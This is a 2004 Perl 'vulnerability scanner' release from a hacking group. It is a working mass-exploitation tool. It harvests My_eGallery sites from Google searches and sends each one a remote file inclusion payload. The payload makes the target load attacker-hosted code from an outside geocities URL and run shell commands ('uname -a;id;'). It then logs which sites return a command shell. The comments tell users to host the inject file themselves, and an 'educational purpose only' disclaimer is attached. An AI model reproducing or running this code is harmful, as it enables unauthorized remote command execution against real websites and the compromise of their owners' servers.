$Id: aresu-tool.2,v1 12/01/2004 aresu Exp $

1ndonesian Security Team (1st)
AresU Tools #2 AresU Vulnerability Scanner #1
12/01/2004




[1st] MyGallery Vulnerability Scanner v1.1
_______________________________________________________________________________


#!/usr/bin/perl
##PRIVATE## Don't ask me how to use it and RTFM dude! ##PRIVATE##
# MyGallery Vulnerability Scanner v1.1
# Author: AresU[at]Bosen.net
# Last update: January 8, 2004
# Start:
# http://www.google.com/search?num=50&hl=en&lr=&ie=UTF-8&oe=utf-8&q=allinurl%3AMy_eGallery&btnG=Google+Search
# Next:
# http://www.google.com/search?q=allinurl:My_eGallery&num=50&hl=en&lr=&ie=UTF-8&oe=utf-8&start=50&sa=N
# ---------------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------------

use Socket;

$bosencekingjelek=<<END
MyGallery Vulnerability Scanner v1.1
Author: AresU[at]Bosen.net

END
;
printlog($bosencekingjelek);

$fsav="m.txt";
$log="m.log";
#Support Proxy Server, change ip and port as u wish :-)
$port=8080;
$host="210.120.128.117";
$target = inet_aton($host);
$exp="/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/kamar_n0ldy/badboy/inject.txt?&cmd=uname -a;id;";

# For Lamerz/Newbies:
# inject.txt is apart of http://www.security-corporation.com/download/exploit/explorerv1_4.txt to running Remote Command Execute, put inject.txt to your personal webpages and change basepath URL to your personal webpages.
# Don't ask me stupid question, about:
# what is inject.txt?
# how can i run this tools?
# Is Bosen thinest or is TioEuy dodolipet?
# All you have to do is learn programming like PERL :-), muach huh hah

#Read last session
open(hf,$fsav);
$lastsav=<hf>;
close(hf);
$check=1;#Check if any save session

$counter=0;
while(1)
{
$googleurl="http://www.google.com/search?q=allinurl:My_eGallery&num=50&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N";
$httppost="GET $googleurl HTTP/1.0\r\n\r\n";
@results=sendraw($httppost);
$data = join("",@results);
$counter=$counter+50;

exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop

@tmp=split(/\<p class\=g\>\<a href\=http\:\/\//,$data);
for ($a = 1; $a < $#tmp; $a++)
{
  @u=split(/\>/,$tmp[$a]);
  @t=split(/\/mod/,$u[0]);
  $url=$t[0];

  if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check)
  {
     next;
  } else
  {
     $check=0;
  }
  #Save Session
  open(hf,">$fsav");
  print hf $url;
  close(hf);
  
  printlog("Target: http://$url\t");
  $urltarget="$url$exp";
  $urltarget=~s/ /%20/g;
  $httppost="GET http://$urltarget HTTP/1.0\r\n\r\n";
  @results=sendraw($httppost);
  $strhasil = join("",@results);

  #Verify output
  #print $strhasil;
  if (!($strhasil=~/Security Corp/))
  {
  printlog("Not Vulnerable\n");
  next;
  }
  #Verify if any shell banner
  @atmp=split(/\<pre\>\<font face\=\"Verdana\" size\=\"1\"\>\r\n/,$strhasil);
  @atmp=split(/\<\/font\>\<\/pre\>/,$atmp[1]);
  $banner=$atmp[0];
  $banner=~s/\n/\r\n/g;
  $p=length($banner);
  if ($p>0)
  {
  printlog("Vulnerable\n");
  printlog("$banner\n");
  }
  else
  {
  printlog("Possible-Vulnerable\n");
  }
}
} #exit while
exit;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
                
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
}

sub printlog {
print @_[0];
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}




AresU <aresu@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=47